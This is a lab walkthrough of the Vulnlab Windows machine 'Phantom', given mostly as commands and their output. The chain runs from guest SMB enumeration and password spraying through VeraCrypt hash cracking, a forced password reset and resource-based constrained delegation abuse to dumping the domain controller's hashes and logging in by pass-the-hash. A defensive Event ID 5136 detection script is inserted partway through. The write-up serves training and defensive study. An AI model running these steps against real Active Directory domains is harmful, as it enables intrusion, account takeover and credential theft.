vulnlab-phantom


a medium windows machine

┌──(puck㉿kali)-[~/vulnlab/phantom]
└─$ crackmapexec smb dc.phantom.vl -u 'guest' -p '' --shares     
SMB         dc.phantom.vl   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:phantom.vl) (signing:True) (SMBv1:False)
SMB         dc.phantom.vl   445    DC               [+] phantom.vl\guest: 
SMB         dc.phantom.vl   445    DC               [+] Enumerated shares
SMB         dc.phantom.vl   445    DC               Share           Permissions     Remark
SMB         dc.phantom.vl   445    DC               -----           -----------     ------
SMB         dc.phantom.vl   445    DC               ADMIN$                          Remote Admin
SMB         dc.phantom.vl   445    DC               C$                              Default share
SMB         dc.phantom.vl   445    DC               Departments Share                 
SMB         dc.phantom.vl   445    DC               IPC$            READ            Remote IPC
SMB         dc.phantom.vl   445    DC               NETLOGON                        Logon server share 
SMB         dc.phantom.vl   445    DC               Public          READ            
SMB         dc.phantom.vl   445    DC               SYSVOL                          Logon server share


crackmapexec smb dc.phantom.vl -u 'guest' -p '' --rid-brute 5000
cat userlist.txt | cut -d '\' -f2 | awk '{print $1}' | tee users.txt


smbclient -U 'guest\phantom.vl' //dc.phantom.vl/Public                                       

Password for [GUEST\phantom.vl]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Jul 11 17:03:14 2024
  ..                                DHS        0  Sun Jul  7 10:39:30 2024
  tech_support_email.eml              A    14565  Sat Jul  6 18:08:43 2024

        6127103 blocks of size 4096. 1181062 blocks available
smb: \> get tech_support_email.eml 
getting file \tech_support_email.eml of size 14565 as tech_support_email.eml (171.4 KiloBytes/sec) (average 171.4 KiloBytes/sec)
smb: \>

Viewing the EML file gives:

Welcome to Phantom!
Dear <NAME>
We are excited to have you on board.
Below are your user credentials:
Username: <USERNAME>
Password: Ph<redacted>t!
Please log in to your account using these credentials. For security reasons, we strongly
recommend that you change your password immediately after your first login.
If you have any questions or need assistance, feel free to reach out to our support team at
techsupport@phantom.vl
Best regards,
The Phant


crackmapexec smb dc.phantom.vl -u users.txt -p 'Ph<redacted>t!' --continue-on-success --no-bruteforce

hashcat to find the password for the VeraCrypt file

hashcat -a 0 -m 13721 IT_BACKUP_201123.hc phantom.txt -r phantom.rule
crackmapexec smb dc.phantom.vl -u 'ibryant' -p 'Ph<redacted>t!' -M spider_plus 

Found in the backup file under /opt/vyatta/config/tmp/new_config_5175/vpn/sstp/authentication/local-users/username/: lstanley gB<redacted>Rc


crackmapexec smb dc.phantom.vl -u users.txt -p gB<redacted>Rc --continue-on-success


crackmapexec winrm dc.phantom.vl -u svc_sspr -p gB<redacted>Rc
evil-winrm --ip phantom.vl -u 'svc_sspr' -p 'gB<redacted>Rc'
bloodhound-python -d phantom.vl -v --zip -c all -u 'svc_sspr' -p 'gB<redacted>Rc' -ns 10.10.115.252 --dns-tcp   

Here comes the fun

net rpc password "crose" "Summer2024" -U "phantom.vl"/"svc_sspr"%"gB<redacted>Rc" -S "phantom.vl"


crackmapexec ldap dc.phantom.vl -u crose -p Summer2024           
SMB         dc.phantom.vl   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:phantom.vl) (signing:True) (SMBv1:False)
LDAP        dc.phantom.vl   389    DC               [+] phantom.vl\crose:Summer2024


crackmapexec ldap dc.phantom.vl -u crose -p Summer2024 -M maq
SMB         dc.phantom.vl   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:phantom.vl) (signing:True) (SMBv1:False)
LDAP        dc.phantom.vl   389    DC               [+] phantom.vl\crose:Summer2024 
MAQ         dc.phantom.vl   389    DC               [*] Getting the MachineAccountQuota
MAQ         dc.phantom.vl   389    DC               MachineAccountQuota: 0

Let’s delegate

impacket-rbcd -delegate-from 'crose' -delegate-to 'DC$' -dc-ip '10.10.123.229' -action 'write' 'phantom.vl'/'crose':'Summer2024'        
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] crose can now impersonate users on DC$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*]     crose        (S-1-5-21-4029599044-1972224926-2225194048-1126)

export KRB5CCNAME=crose.ccache

over-pass-the-hash

impacket-getTGT -hashes :$(pypykatz crypto nt 'Summer2024') 'phantom.vl'/'crose'      
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Saving ticket in crose.ccache

export KRB5CCNAME=crose.ccache
python3 describeTicket.py crose.ccache | grep 'Ticket Session Key'
[*] Ticket Session Key            : 250eee68243a68044b984d8c79a35883
impacket-smbpasswd -newhashes :250eee68243a68044b984d8c79a35883 phantom.vl/crose:'Summer2024'@dc.phantom.vl 
 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

===============================================================================
  Warning: This functionality will be deprecated in the next Impacket version  
===============================================================================

[*] NTLM hashes were changed successfully.
impacket-rbcd -delegate-from 'crose' -delegate-to 'DC$' -dc-ip 10.10.123.229 -action 'write' 'phantom.vl'/'crose' -hashes :250eee68243a68044b984d8c79a35883
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Accounts allowed to act on behalf of other identity:
[*]     crose        (S-1-5-21-4029599044-1972224926-2225194048-1126)
[*] crose can already impersonate users on DC$ via S4U2Proxy
[*] Not modifying the delegation rights.
[*] Accounts allowed to act on behalf of other identity:
[*]     crose        (S-1-5-21-4029599044-1972224926-2225194048-1126)

export KRB5CCNAME=crose.ccache
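A defender-side check for the delegation write above, added here as an example and not part of the original writeup: it scans constructed Event ID 5136 (Directory Service Changes) records for writes to msDS-AllowedToActOnBehalfOfOtherIdentity and rates a write on a domain controller object, or by an account outside an assumed approved list, as high. The approved-writer list, the JSON-lines shape of the events and the WORKSTATION01 object are assumptions for the example.

```python
import json

# Constructed Event ID 5136 records in JSON lines, not logs from the machine.
# OperationType %%14674 is "Value Added", %%14675 is "Value Deleted".
SAMPLE_LOG = "\n".join(json.dumps(e) for e in [
    {"EventID": 5136, "SubjectUserName": "crose",
     "ObjectDN": "CN=DC,OU=Domain Controllers,DC=phantom,DC=vl", "ObjectClass": "computer",
     "AttributeLDAPDisplayName": "msDS-AllowedToActOnBehalfOfOtherIdentity",
     "OperationType": "%%14674"},
    {"EventID": 5136, "SubjectUserName": "svc_sspr",
     "ObjectDN": "CN=crose,CN=Users,DC=phantom,DC=vl", "ObjectClass": "user",
     "AttributeLDAPDisplayName": "pwdLastSet", "OperationType": "%%14674"},
    {"EventID": 5136, "SubjectUserName": "Administrator",
     "ObjectDN": "CN=WORKSTATION01,CN=Computers,DC=phantom,DC=vl", "ObjectClass": "computer",
     "AttributeLDAPDisplayName": "msDS-AllowedToActOnBehalfOfOtherIdentity",
     "OperationType": "%%14675"},
])

RBCD_ATTR = "msDS-AllowedToActOnBehalfOfOtherIdentity"
OP_NAMES = {"%%14674": "added", "%%14675": "removed"}
# Assumption for this example: only these principals are expected to manage delegation.
APPROVED_WRITERS = {"administrator"}


def is_domain_controller(dn):
    """Domain controller computer objects live in the Domain Controllers OU."""
    return "ou=domain controllers" in dn.lower()


def rbcd_alerts(log_text):
    """Return (severity, writer, target_dn, operation) for every change to the
    RBCD attribute. A change on a DC object or by a non-approved principal is
    rated high; any other change is rated medium so it still reaches a reviewer."""
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        if ev.get("EventID") != 5136 or ev.get("AttributeLDAPDisplayName") != RBCD_ATTR:
            continue
        writer, target = ev["SubjectUserName"], ev["ObjectDN"]
        high = is_domain_controller(target) or writer.lower() not in APPROVED_WRITERS
        op = OP_NAMES.get(ev.get("OperationType"), "unknown")
        alerts.append(("high" if high else "medium", writer, target, op))
    return alerts


if __name__ == "__main__":
    for sev, who, where, op in rbcd_alerts(SAMPLE_LOG):
        print(f"[{sev}] {who} {op} a value of {RBCD_ATTR} on {where}")
```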


impacket-getST -u2u -impersonate Administrator -spn 'cifs/dc.phantom.vl' -k -no-pass phantom.vl/'crose'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Impersonating Administrator
[*] Requesting S4U2self+U2U
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@cifs_dc.phantom.vl@PHANTOM.VL.ccache

export KRB5CCNAME=Administrator@cifs_dc.phantom.vl@PHANTOM.VL.ccache


impacket-secretsdump -k dc.phantom.vl
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xa08cda6a38d423ba98b6f79cf6c7880f
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8b<redacted>5d:::


evil-winrm --ip phantom.vl -u 'Administrator' -H '71<redacted>30'

That was fun.
